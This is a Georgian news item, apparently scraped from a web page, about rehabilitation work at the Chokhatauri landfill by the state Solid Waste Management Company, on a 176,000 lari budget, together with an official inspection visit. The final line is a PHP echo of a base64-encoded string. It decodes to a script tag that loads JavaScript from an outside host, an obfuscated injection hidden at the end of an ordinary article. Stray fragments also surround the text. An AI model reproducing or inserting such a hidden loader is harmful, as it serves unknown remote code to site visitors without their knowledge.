celsiusi
ავერსი შნაიდერი

 საქართველოს რეგიონული განვითარებისა და ინფრასტრუქტურის სამინისტროს შპს „საქართველოს მყარი ნარჩენების მართვის კომპანია“ ჩოხატაურის არსებული ნაგავსაყრელის სარეაბილიტაციო სამუშაოებს აგრძელებს.

აღნიშნულთან დაკავშირებით ინფორმაციას რეგიონული განვითარებისა და ინფრასტრუქტურის სამინისტრო ავრცელებს.

მათი ცნობით, სამუშაოების ფარგლებში, ნარჩენები საიზოლაციო ფენით იფარება, შიდა გზები და მიწაყრილები (მიწის კავალიერები) ეწყობა.

„სარეაბილიტაციო სამუშაოები მიმდინარე წლის სექტემბერში დასრულება. პროექტის ბიუჯეტი 176 000 ლარია.

საქართველოს რეგიონული განვითარებისა და ინფრასტრუქტურის მინისტრის მოადგილე მზია გიორგობიანი და შპს “საქართველოს მყარი ნარჩენების მართვის კომპანიის” დირექტორი გიორგი შუხოშვილი სამტრედიისა და ჩოხატაურის მოქმედი ნაგავსაყრელების სარეაბილიტაციო და ოპერირების სამუშაოებს ადგილზე გაეცნენ.

ნარჩენების სწორი მართვის მიზნით, სარეაბილიტაციო სამუშაოები კომპანიის დაქვემდებარებაში არსებულ ობიექტებს სისტემატურად უტარდება, რაც უზრუნველყოფს საყოფაცხოვრებო ნარჩენების უსაფრთხო განთავსებასა და მართვას“, - ნათქვამია გავრცელებულ ინფორმაციაში.

133
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");